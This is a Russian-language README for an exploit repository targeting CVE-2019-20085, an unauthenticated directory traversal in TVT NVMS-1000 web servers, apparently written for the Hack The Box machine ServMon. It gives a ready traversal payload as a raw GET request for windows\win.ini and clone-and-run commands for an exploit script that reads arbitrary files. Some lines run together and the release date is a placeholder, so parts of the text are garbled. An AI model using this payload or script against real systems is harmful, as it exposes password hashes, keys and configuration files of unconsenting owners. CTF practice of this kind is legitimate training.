
Репозиторий, используемый для машины ServMon на Hackthebox
Автор: Z3R0 CVE: CVE-2019-20085 Цель: TVT NVMS-1000 (все известные версии до выхода патча) Тип уязвимости: Неавторизованный обход каталога (Directory Traversal) Дата: [Вставьте дату релиза]
Программное обеспечение NVMS-1000 от TVT содержит уязвимость обхода каталога в компоненте веб-сервера. Отправляя специально сформированный GET-запрос с последовательностями /.., неавторизованный злоумышленник может получить доступ к произвольным файлам операционной системы, включая конфиденциальные конфигурационные файлы, хеши паролей или системные ключи.
Данный эксплойт использует уязвимое разрешение путей к файлам в HTTP-сервере, работающем на NVMS-1000. Аутентификация не требуется. Удалённый злоумышленник может прочитать любой файл, доступный пользователю службы.
GET /..%5C..%5C..%5C..%5Cwindows%5Cwin.ini HTTP/1.1
Host: <target-ip>:80
C:\Windows\win.ini)requests (pip install requests)git clone https://github.com/Z3R0-0x30/CVE-2019-20085.git
cd CVE-2019-20085
python3 exploit.py http://domain.local/ ../../windows/win.ini win.ini"
Данный эксплойт публикуется только в образовательных целях и для санкционированных исследований безопасности. Автор Z3R0 не несёт ответственности за любое неправомерное использование или несанкционированный доступ. Всегда получайте соответствующее разрешение перед тестированием систем.